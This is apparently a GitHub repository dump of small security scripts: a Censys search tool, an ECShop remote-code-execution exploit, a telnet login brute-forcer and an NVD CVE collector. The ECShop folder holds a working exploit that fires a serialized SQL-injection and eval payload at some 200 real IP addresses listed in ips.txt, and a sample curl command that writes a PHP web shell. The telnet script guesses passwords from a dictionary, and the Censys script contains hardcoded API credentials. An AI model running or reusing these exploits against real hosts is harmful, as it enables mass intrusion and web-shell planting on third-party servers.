├── README.md ├── _config.yml ├── censys ├── README.md ├── __init__.py ├── censys.txt └── script.py ├── ecshop ├── __init__.py ├── ips.txt ├── rce.py └── sample ├── telnet ├── README.md └── telnet.py └── vul-info-collect ├── .DS_Store ├── README.md ├── __init__.py ├── list.css ├── mysql 5.7.21 ├── cve.html └── list.css ├── sample.png └── script.py /README.md: -------------------------------------------------------------------------------- 1 | # scripts 2 | 主要是收集自己编写、改造的一些小的脚本 3 | 4 | ## 更新日志 5 | 6 |
7 | 2021.10.15 ~ crt_check 8 | 批量自动化检查目标系统证书是否过期
9 | 独立项目链接:https://github.com/starnightcyber/crt_check 10 |
11 | 12 |
13 | 2020.12.13 ~ masnmap 14 | masscan + nmap 快速端口存活检测和服务识别。
15 | 独立项目链接:https://github.com/starnightcyber/masnmap 16 |
17 | 18 | 19 |
20 | 2020.4.19 ~ Nessus_to_report 21 | Nessus_to_report Nessus报告转中文,脚本更新至Python3
22 | 独立项目链接:https://github.com/starnightcyber/Nessus_to_report 23 |
24 | 25 |
26 | 2020.4.16 ~ ZoomEye 27 | ZoomEye脚本更新至Python3
28 | 独立项目链接:https://github.com/starnightcyber/ZoomEye 29 |
30 | 31 |
32 | 2020.4.13 ~ telnet 33 | Telnet客户端类,处理基本的登录、执行命令,请随意改造。 34 |
35 | 36 |
37 | 2020.3.17 ~ cve_for_today 38 | 获取每日更新的CVE漏洞信息。
39 | 独立项目链接:https://github.com/starnightcyber/cve_for_today 40 |
41 | 42 |
43 | 2020.1.18 ~ vul-info-collect 44 | 从美国国家漏洞库NVD获取某个特定版本软件的漏洞统计信息 45 | 46 | 独立项目链接:https://github.com/starnightcyber/vul-info-collect 47 |
48 | 49 |
50 | 2018.10.31 ~ vul-info-collect 51 | 从NVD获取关于某个版本软件的漏洞信息。 52 | 53 | 博客链接:[获取某个版本软件存在的漏洞信息](https://www.cnblogs.com/Hi-blog/p/vulnerabilities-with-specific-version-of-software.html) 54 |
55 | 56 |
57 | 2018.1.30 ~ ip-reverse-to-domain 58 | ip到域名的反向解析,有一些在线工具可供使用,这个提供解析服务的站点好像之前挂过,不确定是否可以使用 59 | 60 | 项目地址:[ip-reverse-to-domain](https://github.com/starnightcyber/ip-reverse-to-domain) 61 |
62 | 63 |
64 | 2018.1.30 ~ findSubDomains 65 | 子域名爆破脚本 66 | 67 | 讲道理速度很快并且爆破出的域名和对应ip地址应该都有效 68 | 69 | 项目地址:[findSubDomains](https://github.com/starnightcyber/findSubDomains) 70 | 71 | 博客链接:[子域名爆破](http://www.cnblogs.com/Hi-blog/p/7606027.html) 72 |
73 | 74 | 75 |
76 | 2018.1.30 ~ Shodan 77 | Shodan 网络空间搜索引擎鼻祖,大家都懂 : https://www.shodan.io/ 78 | 79 | 项目地址:[Shodan](https://github.com/starnightcyber/Shodan) 80 | 81 | 博客链接:[Shodan 使用](http://www.cnblogs.com/Hi-blog/p/6904190.html) 82 |
83 | 84 |
85 | 2018.1.30 ~ ZoomEye 86 | ZoomEye 是国内的一款网络空间搜索引擎,很强和暴力,不多介绍:https://www.zoomeye.org/ 87 | 88 | 项目地址:[ZoomEye](https://github.com/starnightcyber/ZoomEye) 89 | 90 | 博客链接:[从ZoomEye API 到 Weblogic 弱口令扫描](http://www.cnblogs.com/Hi-blog/p/6127387.html) 91 |
92 | 93 |
94 | 2017.11.27 ~ Censys 95 | censys 是一款网络空间搜索引擎 https://censys.io 96 | 97 | 跟Shodan和ZoomEye等搜索引擎类似,目前可以免费使用,商业版也正在推出 98 | 99 | 关于Censys更详细的介绍,请参考博客:[Censys](http://www.cnblogs.com/Hi-blog/p/7798940.html "Censys") 100 |
101 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker -------------------------------------------------------------------------------- /censys/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## 简介 3 | censys 是一款网络空间搜索引擎 https://censys.io 4 | 5 | 跟Shodan和ZoomEye等搜索引擎类似,目前可以免费使用,目前商业版也正在推出 6 | 7 | 关于Censys更详细的介绍,请参考博客:[Censys](http://www.cnblogs.com/Hi-blog/p/7798940.html) 8 | 9 | ## Sample 10 | 11 | starnight:censys starnight$ python script.py 12 | please input query string : "weblogic" 13 | ('---', 'weblogic', '---') 14 | Total_count:11836 15 | please input file name to save data (censys.txt default) : "weblogic" 16 | page :1 17 | Total_count:1183 18 | 46.244.104.198:80 19 | 46.244.104.198:8080 20 | 31.134.202.10:2323 21 | 31.134.202.10:80 22 | 31.134.202.10:8080 23 | 31.134.203.85:2323 24 | 31.134.203.85:80 25 | 31.134.203.85:8080 26 | 31.134.205.92:2323 27 | 31.134.205.92:80 28 | 31.134.205.92:8080 29 | 31.134.206.202:2323 30 | 31.134.206.202:80 31 | 31.134.206.202:8080 32 | 31.134.201.249:80 33 | 31.134.201.249:8080 34 | 31.134.202.233:80 35 | 31.134.202.233:8080 36 | 31.134.200.94:80 37 | 31.134.200.94:8080 38 | 31.134.201.248:80 39 | 31.134.201.248:8080 40 | 31.134.200.6:80 41 | 31.134.200.6:8080 42 | 46.244.105.216:80 43 | 46.244.105.216:8080 44 | 31.134.206.131:80 45 | 31.134.206.131:2323 46 | 31.134.206.131:8080 47 | 31.134.204.127:80 48 | 31.134.204.127:8080 49 | 46.244.10.173:80 50 | 46.244.10.173:23 51 | 46.244.10.173:8080 52 | 31.134.202.82:80 53 | 31.134.202.82:8080 54 | 46.244.105.252:80 55 | 46.244.105.252:2323 56 | 46.244.105.252:8080 57 | 31.134.205.186:2323 58 | 31.134.205.186:80 59 | 31.134.205.186:8080 60 | 31.134.204.223:80 61 | 31.134.204.223:8080 62 | 31.134.207.182:2323 63 | 31.134.207.182:80 64 | 31.134.207.182:8080 65 | 
-------------------------------------------------------------------------------- /censys/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/censys/__init__.py -------------------------------------------------------------------------------- /censys/script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import sys 5 | import json 6 | import requests 7 | import time 8 | 9 | API_URL = "https://www.censys.io/api/v1" 10 | UID = "aa7c1f3a-b6ab-497d-9788-5e9e4898a655" 11 | SECRET = "rSEvCfRQexNKXmpx940DQXWExWAFjkt1" 12 | page = 1 13 | PAGES = 2 # the pages you want to fetch 14 | 15 | 16 | def getIp(query, page): 17 | ''' 18 | Return ips and total amount when doing query 19 | ''' 20 | iplist = [] 21 | data = { 22 | "query": query, 23 | "page": page, 24 | "fields": ["ip", "protocols", "location.country"] 25 | } 26 | try: 27 | res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET)) 28 | 29 | except: 30 | pass 31 | try: 32 | results = res.json() 33 | except: 34 | pass 35 | if res.status_code != 200: 36 | print("error occurred: %s" % results["error"]) 37 | sys.exit(1) 38 | # total query result 39 | # iplist.append("Total_count:%s" % (results["metadata"]["count"])) 40 | 41 | # add result in some specific form 42 | for result in results["results"]: 43 | for i in result["protocols"]: 44 | # iplist.append(result["ip"] + ':' + i + ' in ' + result["location.country"][0]) 45 | iplist.append(result["ip"] + ':' + i) 46 | # return ips and total count 47 | return iplist, results["metadata"]["count"] 48 | 49 | 50 | if __name__ == '__main__': 51 | 52 | query = input('please input query string : ') 53 | print('---', query, '---') 54 | ips, num = getIp(query=query, page=page) 55 | 56 | print("Total_count:%s" % num) 57 | 58 | 
dst = input('please input file name to save data (censys.txt default) : ') 59 | 60 | # 保存数据到文件 61 | if dst: 62 | dst = dst + '.txt' 63 | else: 64 | dst = 'censys.txt' 65 | 66 | # get result and save to file page by page 67 | with open(dst, 'a') as f: 68 | while page <= PAGES: 69 | print('page :' + str(page)) 70 | iplist, num = (getIp(query=query, page=page)) 71 | page += 1 72 | 73 | for i in iplist: 74 | print i[:i.find('/')] 75 | 76 | for i in iplist: 77 | f.write(i[:i.find('/')] + '\n') 78 | time.sleep(3) 79 | print('Finished. data saved to file', dst) 80 | -------------------------------------------------------------------------------- /ecshop/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/ecshop/__init__.py -------------------------------------------------------------------------------- /ecshop/ips.txt: -------------------------------------------------------------------------------- 1 | 54.223.184.91:80 2 | 54.65.116.232:80 3 | 54.223.208.255:80 4 | 54.223.202.126:80 5 | 54.223.213.120:80 6 | 54.223.219.33:80 7 | 54.223.204.56:80 8 | 58.64.143.240:443 9 | 58.215.76.27:443 10 | 123.233.118.21:8080 11 | 123.57.91.18:8080 12 | 123.58.133.42:8080 13 | 60.250.51.94:80 14 | 60.205.215.172:80 15 | 60.174.234.7:80 16 | 60.174.234.112:80 17 | 60.251.118.245:80 18 | 60.199.243.180:80 19 | 60.248.187.50:80 20 | 60.173.245.244:80 21 | 60.205.180.63:80 22 | 60.6.234.111:80 23 | 60.205.156.56:80 24 | 60.205.114.84:80 25 | 60.205.123.114:80 26 | 60.250.51.91:80 27 | 60.161.14.95:80 28 | 121.199.13.180:88 29 | 198.55.121.113:443 30 | 198.20.83.74:443 31 | 198.2.205.60:443 32 | 198.1.115.121:443 33 | 211.149.202.23:81 34 | 36.102.220.44:82 35 | 139.224.64.155:443 36 | 139.198.124.213:443 37 | 139.196.252.220:443 38 | 139.129.200.231:443 39 | 139.196.176.28:443 40 | 139.198.126.92:443 41 | 139.162.108.158:443 42 | 139.196.114.108:443 43 
| 139.129.218.155:443 44 | 173.254.231.80:443 45 | 122.112.210.197:82 46 | 123.206.63.118:8010 47 | 140.143.100.101:443 48 | 140.207.158.60:443 49 | 219.138.105.202:8090 50 | 72.41.84.202:80 51 | 114.215.238.190:81 52 | 116.62.128.52:8088 53 | 198.55.121.113:80 54 | 198.2.206.239:80 55 | 198.27.87.230:80 56 | 43.247.176.115:8080 57 | 47.106.112.73:8080 58 | 61.164.161.42:8080 59 | 61.155.60.188:8080 60 | 61.163.95.250:8080 61 | 116.255.250.98:8081 62 | 116.255.250.64:8081 63 | 121.46.128.248:8080 64 | 121.201.66.149:8080 65 | 113.106.89.242:8080 66 | 115.28.174.58:8080 67 | 116.255.185.187:8080 68 | 116.255.185.161:8080 69 | 116.255.185.169:8080 70 | 116.255.185.172:8080 71 | 116.255.185.175:8080 72 | 116.255.185.160:8080 73 | 116.255.185.179:8080 74 | 116.255.185.165:8080 75 | 116.255.185.166:8080 76 | 116.255.185.182:8080 77 | 116.255.185.177:8080 78 | 116.255.185.168:8080 79 | 116.255.185.180:8080 80 | 116.255.185.163:8080 81 | 116.255.229.106:8080 82 | 116.255.185.184:8080 83 | 116.255.185.183:8080 84 | 116.255.185.185:8080 85 | 116.62.195.29:8080 86 | 116.255.185.174:8080 87 | 118.178.225.118:8080 88 | 118.193.203.154:8080 89 | 119.90.149.200:8080 90 | 122.14.200.53:8080 91 | 124.164.241.171:8080 92 | 124.133.228.144:8080 93 | 139.224.3.96:8080 94 | 222.73.135.210:8080 95 | 205.209.185.36:8083 96 | 139.199.19.123:8888 97 | 140.207.114.214:8090 98 | 117.34.70.140:443 99 | 117.41.235.168:443 100 | 120.25.105.14:8088 101 | 120.25.223.215:8088 102 | 120.24.75.187:8088 103 | 112.124.26.5:5000 104 | 119.180.20.209:8000 105 | 118.24.133.227:443 106 | 118.123.17.178:443 107 | 118.23.162.143:443 108 | 118.190.101.215:443 109 | 118.31.249.220:443 110 | 118.193.189.93:443 111 | 118.193.189.94:443 112 | 118.25.38.74:443 113 | 118.123.18.98:443 114 | 118.89.46.63:443 115 | 118.25.119.182:443 116 | 120.79.174.15:8002 117 | 101.201.122.19:81 118 | 13.228.94.125:80 119 | 13.229.21.16:80 120 | 13.113.239.161:80 121 | 13.228.118.154:80 122 | 13.113.65.254:80 123 | 
13.113.8.25:80 124 | 13.75.94.228:80 125 | 13.229.161.92:80 126 | 13.228.232.15:80 127 | 13.124.140.255:80 128 | 13.75.120.16:80 129 | 13.94.47.234:80 130 | 13.75.46.187:80 131 | 13.112.27.57:80 132 | 13.228.129.107:80 133 | 13.250.173.205:80 134 | 13.251.38.215:80 135 | 13.112.194.18:80 136 | 13.113.149.110:80 137 | 13.115.154.185:80 138 | 13.250.124.140:80 139 | 118.139.188.163:80 140 | 118.24.23.121:80 141 | 118.24.17.179:80 142 | 118.190.149.8:80 143 | 118.184.23.254:80 144 | 118.178.185.188:80 145 | 118.31.249.220:80 146 | 118.89.46.63:80 147 | 118.184.64.99:80 148 | 118.190.151.184:80 149 | 118.89.187.145:80 150 | 118.184.30.251:80 151 | 118.190.140.40:80 152 | 118.140.0.238:80 153 | 118.190.75.41:80 154 | 118.190.208.99:80 155 | 118.244.234.181:80 156 | 118.89.170.109:80 157 | 118.31.76.95:80 158 | 118.190.104.157:80 159 | 118.23.162.143:80 160 | 118.144.133.74:80 161 | 118.31.102.227:80 162 | 118.193.189.94:80 163 | 118.26.135.62:80 164 | 118.178.195.50:80 165 | 118.190.70.58:80 166 | 118.178.152.222:80 167 | 118.190.145.41:80 168 | 118.178.125.213:80 169 | 223.112.5.42:80 170 | 223.26.62.245:80 171 | 223.26.50.31:80 172 | 223.26.49.228:80 173 | 223.93.185.53:80 174 | 223.4.92.17:80 175 | 223.26.49.239:80 176 | 1.234.20.78:80 177 | 1.34.241.117:80 178 | 1.34.157.105:80 179 | 1.171.55.153:80 180 | 111.30.66.29:8090 181 | 13.112.135.89:80 182 | 13.228.201.159:80 183 | 171.34.77.29:80 184 | 23.249.181.228:80 185 | 23.97.74.84:80 186 | 23.102.224.231:80 187 | 23.97.74.96:80 188 | 23.102.232.51:80 189 | 27.223.97.172:80 190 | 27.105.106.55:80 191 | 36.111.197.135:80 192 | 39.106.151.108:80 193 | 39.105.124.197:80 194 | 39.106.19.179:80 195 | 39.108.102.190:80 196 | 39.108.105.219:80 197 | 39.108.172.180:80 198 | 39.108.182.29:80 199 | 39.108.246.219:80 200 | 39.106.140.151:80 -------------------------------------------------------------------------------- /ecshop/rce.py: -------------------------------------------------------------------------------- 1 | 
#!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | """ 5 | references: 6 | https://www.anquanke.com/post/id/158677 7 | http://www.freebuf.com/vuls/182899.html 8 | """ 9 | 10 | import os 11 | import requests 12 | 13 | payload = ''' --connect-timeout 10 -m 20 -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca' 14 | ''' 15 | succeed = set() 16 | 17 | 18 | def attack(ip_port): 19 | # step 1 : construct target url 20 | # distinguish http/https 21 | proto = 'http' 22 | if ':' in ip_port: 23 | ip, port = ip_port.split(':') 24 | if port == '443': 25 | proto = 'https' 26 | 27 | target = '{}://{}/user.php'.format(proto, ip_port) 28 | 29 | # step 2 : construct command to execute 30 | cmd = 'curl {} {}'.format(target, payload) 31 | try: 32 | # step 3: execute curl command 33 | result = os.popen(cmd).read() 34 | 35 | # step 4: check whether vulnerable 36 | cmd2 = '{}://{}/vulnspy.php?vulnspy=phpinfo();'.format(proto, ip_port) 37 | request = requests.get(cmd2, timeout=15) 38 | 39 | print(request.status_code) 40 | print() 41 | if request.status_code == 200 and 'PHP Version' in request.text: 42 | msg = '{} is vulnerable to rce\n'.format(ip_port) 43 | succeed.add(ip_port) 44 | print(msg) 45 | except: 46 | pass 47 | 48 | 49 | if __name__ == '__main__': 50 | # target = '*.*.*.*' 51 | i = 1 52 | with open('ips.txt', 'r') as fr: 53 | for line in fr.readlines(): 54 | target = line.strip() 55 | print('%d : checkng %s' % (i, target)) 56 | i += 1 57 | attack(target) 58 | 59 | if len(succeed) != 0: 60 | print('\n\n\n------ following hosts are vulnerable --------') 61 | for line in succeed: 62 | print(line) 63 | 64 | 
-------------------------------------------------------------------------------- /ecshop/sample: -------------------------------------------------------------------------------- 1 | 2 | curl http://***/user.php -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca' 3 | 4 | 5 | curl http://***/user.php -d 'action=login&vulnspy=eval(base64_decode($_POST[d]));exit;&d=ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8%2BJyk7' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca' 6 | 7 | 8 | http://*.*.*/vulnspy.php?vulnspy=phpinfo(); 9 | 10 | 11 | -------------------------------------------------------------------------------- /telnet/README.md: -------------------------------------------------------------------------------- 1 | # TelnetClient 2 | TelnetClient类,处理Telnet客户端相关,如最基本的登录和执行命令。 3 | 4 | ## Telnet登陆认证相关 5 | 6 | ``` 7 | auth = { 8 | "user_prompt": b'Username:', # 输入用户名提示 9 | "password_prompt": b'Password:', # 输入密码提示 10 | "enter": b'\r', # 回车 11 | "remote_enter": b'\n\r', 12 | } 13 | ``` 14 | 有一点请注意,标准输入结尾是换行'\n',也有一些是回车'\r'。 15 | 16 | ## Sample 17 | 仅供演示,脚本请自己改造。 18 | 19 | ``` 20 | # python3 telnet_brute.py 21 | trying to login 172.16.176.120:2570 telnet service 22 | try user:[admin], password:[admin] 23 | try user:[aaa], password:[bbb] 24 | try user:[], password:[] 25 | 登录成功 26 | ==> ver 27 | 
Version :PAS_SIPPROXY_6.0.0.3.0.190831, Compile Time: 16:18:41, Feb 25 2020 28 | Return value: 1 29 | SipPrxoy-> 30 | ``` 31 | 以上! -------------------------------------------------------------------------------- /telnet/telnet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import logging 5 | import telnetlib 6 | import time 7 | 8 | 9 | # telnet登录认证相关 10 | auth = { 11 | "user_prompt": b'Username:', # 输入用户名提示 12 | "password_prompt": b'Password:', # 输入密码提示 13 | "enter": b'\r', # 回车 14 | "remote_enter": b'\n\r', 15 | } 16 | 17 | 18 | class TelnetClient(object): 19 | def __init__(self): 20 | self.tn = telnetlib.Telnet() # Telnet client 21 | 22 | def login(self, ip, port, tel_dict): 23 | """ 24 | telnet 登录 25 | :param ip: 目标ip 26 | :param port: 目标端口 27 | :param tel_dict: 密码字典 28 | :return: 登录成功(True) or 登录失败(False) 29 | """ 30 | msg = 'trying to login {}:{} telnet service'.format(ip, port) 31 | print(msg) 32 | 33 | # telnet登录 34 | for username, password in tel_dict.items(): 35 | 36 | # 创建一个telnet连接 37 | try: 38 | self.tn.open(ip, port) 39 | except: 40 | logging.warning('%s网络连接失败' % ip) 41 | return False, '' 42 | 43 | msg = 'try user:[{}], password:[{}]'.format(username, password) 44 | print(msg) 45 | 46 | # 登录尝试 47 | try: 48 | # 等待输入用户名提示user_prompt出现后,输入用户名 49 | self.tn.read_until(auth['user_prompt'], timeout=3) 50 | self.tn.write(username.encode('ascii') + auth['enter']) 51 | 52 | # 等待输入密码提示password_prompt出现后,输入密码 53 | self.tn.read_until(auth['password_prompt'], timeout=3) 54 | self.tn.write(password.encode('ascii') + auth['enter']) 55 | 56 | # 延时两秒再收取返回结果,给服务端足够响应时间 57 | time.sleep(2) 58 | 59 | # 获取登录结果, read_very_eager()获取到的是的是上次获取之后本次获取之前的所有输出 60 | command_result = self.tn.read_very_eager().decode('ascii') 61 | # print('===>', command_result) 62 | prompt, _ = command_result.split('->') 63 | # print('===>', prompt.strip()) 64 | 65 | # 如果返回的结果中没有提示输入用户名,表示登录成功 66 | if 
auth['user_prompt'] not in command_result.encode('ascii'): 67 | print('登录成功') 68 | return True 69 | else: 70 | continue 71 | except: 72 | pass 73 | return False 74 | 75 | def execute_command(self, command): 76 | """ 77 | 执行一些命令 78 | :param command: 要执行的命令 79 | :return: None 80 | """ 81 | try: 82 | self.tn.write(command.encode('ascii') + auth['enter']) 83 | time.sleep(2) 84 | # 获取命令结果 85 | command_result = self.tn.read_very_eager().decode('ascii') 86 | print('==>', command_result) 87 | except: 88 | print('something went wrong...') 89 | pass 90 | 91 | # 退出telnet,保留 92 | def logout_host(self): 93 | self.tn.write(b"bye\r") 94 | 95 | if __name__ == '__main__': 96 | 97 | # 参数 98 | ip = '172.16.176.120' 99 | port = '2570' 100 | tel_dict = {'admin': 'admin', 'aaa': 'bbb', '': ''} 101 | 102 | # 登陆 103 | tn = TelnetClient() 104 | tn.login(ip, port, tel_dict) 105 | 106 | # 执行命令 107 | command = 'ver' 108 | tn.execute_command(command) 109 | 110 | # 退出 111 | tn.logout_host() -------------------------------------------------------------------------------- /vul-info-collect/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/vul-info-collect/.DS_Store -------------------------------------------------------------------------------- /vul-info-collect/README.md: -------------------------------------------------------------------------------- 1 | # vul-info-collect 2 | 3 | 从NVD获取关于某个版本软件的漏洞信息。 4 | 5 | 博客链接:[获取某个版本软件存在的漏洞信息](https://www.cnblogs.com/Hi-blog/p/vulnerabilities-with-specific-version-of-software.html) 6 | 7 | ## Sample 8 | 9 | ![image](https://github.com/starnightcyber/scripts/blob/master/vul-info-collect/sample.png) 10 | 11 | -------------------------------------------------------------------------------- /vul-info-collect/__init__.py: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/vul-info-collect/__init__.py -------------------------------------------------------------------------------- /vul-info-collect/list.css: -------------------------------------------------------------------------------- 1 | body{background: #f5f5f5;margin: 0px; margin-top: -20px;padding: 0px;}#div_title{ background: #2171c2; color: #fff; height: 60px; box-shadow: 0 .25em .75em #CCC; padding-top: 15px; margin-top: 0px; font-family: "Microsoft Yahei" normal; font-size: 12px; z-index: 20; position: fixed; width: 100%;}#div_title_inner{ width: 1004px; margin-left: auto; margin-right: auto;}#div_title h2{ width: 130px; display: inline-block; float: right; margin-top: 3.5%;}#div_title h1{ font-weight: normal; margin-left: auto; margin-right: auto; display: inline-block; font-family: "Microsoft YaHei" !important;}#div_title_occupy{ height: 69px;}#div_main{width: 1004px;font-family: "Microsoft Yahei",helvetica,'Lucida Grande',Tahoma,Verdana,Simsun,Arial,Clean;margin-left: auto;margin-right: auto; margin-top: 15px;}#div_content{ position: fixed; width: 250px; overflow-y:scroll; height:520px; overflow: auto; background-color: #f2f2f2; padding-left: 15px; margin-top: 2px;}#div_content_body h3{ height: 10px;}#div_body{ margin-left: 250px; width: 824px; overflow: auto}#example_div{width: 650px;border: 1px dashed #cecfcf;background : #f5f6f7;font-family: Consolas,Menlo,"Liberation Mono",Courier,monospace!important;padding-left: 2px;padding-top: 5px;padding-bottom: 5px;font-size: 13px;min-height: 50px;}#uri_list_div a { color: #5f940a; text-decoration: none; font-size: 13px; height: 10px}#uri_list_div a:hover{ text-decoration: underline;}#data_style{ width:70px;}table.uri_t td{padding-left: 10px; width: 550px;}table.t { font-size: 13px; margin-top: 5px; margin-bottom: 5px; width: 655px; border: 1px solid #e4e4e4; border-right: 0; border-collapse: collapse;}table.t tr { min-height: 
25px; line-height: 20px;}table.t th { background-color: #efefef; text-align: center; border-right: 1px solid #e4e4e4; border-bottom: 1px solid #e4e4e4; color: #000;}table.t td { border-right: 1px solid #e4e4e4; border-bottom: 1px solid #e4e4e4; color: #000; background-color: #fff; text-align: left; padding-left: 5px;}#div_get, #div_post, #div_push{ background-color: #fff; box-shadow: 0 2px 5px 0 rgba(0,0,0,.26); padding: 64px; margin: 2px 20px 20px 20px;} -------------------------------------------------------------------------------- /vul-info-collect/mysql 5.7.21/cve.html: -------------------------------------------------------------------------------- 1 | CVEs

CVEs for mysql 5.7.21

漏洞列表

CVE-2018-3286    中
CVE-2018-3284    中
CVE-2018-3283    中
CVE-2018-3282    中
CVE-2018-3279    中
CVE-2018-3278    中
CVE-2018-3277    中
CVE-2018-3276    中
CVE-2018-3251    中
CVE-2018-3247    中
CVE-2018-3212    中
CVE-2018-3203    中
CVE-2018-3200    中
CVE-2018-3195    中
CVE-2018-3187    中
CVE-2018-3186    中
CVE-2018-3185    中
CVE-2018-3182    中
CVE-2018-3174    中
CVE-2018-3173    中
CVE-2018-3171    中
CVE-2018-3170    中
CVE-2018-3162    中
CVE-2018-3161    中
CVE-2018-3156    中
CVE-2018-3155    高
CVE-2018-3145    中
CVE-2018-3144    中
CVE-2018-3143    中
CVE-2018-3137    中
CVE-2018-3133    中
CVE-2018-3084    低
CVE-2018-3082    低
CVE-2018-3081    中
CVE-2018-3080    中
CVE-2018-3079    中
CVE-2018-3078    中
CVE-2018-3077    中
CVE-2018-3075    中
CVE-2018-3074    中
CVE-2018-3073    中
CVE-2018-3071    中
CVE-2018-3070    中
CVE-2018-3067    中
CVE-2018-3066    低
CVE-2018-3065    中
CVE-2018-3064    高
CVE-2018-3062    中
CVE-2018-3061    中
CVE-2018-3060    中
CVE-2018-3058    中
CVE-2018-3056    中
CVE-2018-3054    中
CVE-2018-2767    低
CVE-2018-2846    中
CVE-2018-2839    中
CVE-2018-2819    中
CVE-2018-2818    中
CVE-2018-2817    中
CVE-2018-2816    中
CVE-2018-2813    中
CVE-2018-2812    中
CVE-2018-2810    中
CVE-2018-2787    中
CVE-2018-2786    中
CVE-2018-2784    中
CVE-2018-2782    中
CVE-2018-2781    中
CVE-2018-2780    中
CVE-2018-2779    中
CVE-2018-2778    中
CVE-2018-2777    中
CVE-2018-2776    中
CVE-2018-2775    中
CVE-2018-2773    中
CVE-2018-2771    中
CVE-2018-2769    中
CVE-2018-2766    中
CVE-2018-2762    中
CVE-2018-2761    中
CVE-2018-2759    中
CVE-2018-2758    中
CVE-2018-2755    高
等级 严重 高危 中危 低危
个数(83) 0 3 76 4
-------------------------------------------------------------------------------- /vul-info-collect/mysql 5.7.21/list.css: -------------------------------------------------------------------------------- 1 | body{background: #f5f5f5;margin: 0px; margin-top: -20px;padding: 0px;}#div_title{ background: #2171c2; color: #fff; height: 60px; box-shadow: 0 .25em .75em #CCC; padding-top: 15px; margin-top: 0px; font-family: "Microsoft Yahei" normal; font-size: 12px; z-index: 20; position: fixed; width: 100%;}#div_title_inner{ width: 1004px; margin-left: auto; margin-right: auto;}#div_title h2{ width: 130px; display: inline-block; float: right; margin-top: 3.5%;}#div_title h1{ font-weight: normal; margin-left: auto; margin-right: auto; display: inline-block; font-family: "Microsoft YaHei" !important;}#div_title_occupy{ height: 69px;}#div_main{width: 1004px;font-family: "Microsoft Yahei",helvetica,'Lucida Grande',Tahoma,Verdana,Simsun,Arial,Clean;margin-left: auto;margin-right: auto; margin-top: 15px;}#div_content{ position: fixed; width: 250px; overflow-y:scroll; height:520px; overflow: auto; background-color: #f2f2f2; padding-left: 15px; margin-top: 2px;}#div_content_body h3{ height: 10px;}#div_body{ margin-left: 250px; width: 824px; overflow: auto}#example_div{width: 650px;border: 1px dashed #cecfcf;background : #f5f6f7;font-family: Consolas,Menlo,"Liberation Mono",Courier,monospace!important;padding-left: 2px;padding-top: 5px;padding-bottom: 5px;font-size: 13px;min-height: 50px;}#uri_list_div a { color: #5f940a; text-decoration: none; font-size: 13px; height: 10px}#uri_list_div a:hover{ text-decoration: underline;}#data_style{ width:70px;}table.uri_t td{padding-left: 10px; width: 550px;}table.t { font-size: 13px; margin-top: 5px; margin-bottom: 5px; width: 655px; border: 1px solid #e4e4e4; border-right: 0; border-collapse: collapse;}table.t tr { min-height: 25px; line-height: 20px;}table.t th { background-color: #efefef; text-align: center; border-right: 1px solid #e4e4e4; 
border-bottom: 1px solid #e4e4e4; color: #000;}table.t td { border-right: 1px solid #e4e4e4; border-bottom: 1px solid #e4e4e4; color: #000; background-color: #fff; text-align: left; padding-left: 5px;}#div_get, #div_post, #div_push{ background-color: #fff; box-shadow: 0 2px 5px 0 rgba(0,0,0,.26); padding: 64px; margin: 2px 20px 20px 20px;} -------------------------------------------------------------------------------- /vul-info-collect/sample.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/vul-info-collect/sample.png -------------------------------------------------------------------------------- /vul-info-collect/script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import requests 5 | import re 6 | from bs4 import BeautifulSoup 7 | import math 8 | 9 | 10 | class CveObject: 11 | cve_no = '' # 漏洞编号 12 | cve_url = '' # 漏洞cve url链接地址 13 | cve_nvd_url = '' # 漏洞nvd url链接地址 14 | cve_description = '' # 漏洞描述 15 | cve_create_time = '' # 创建时间 16 | cve_modify_time = '' # 修改时间 17 | cve_level = '' # 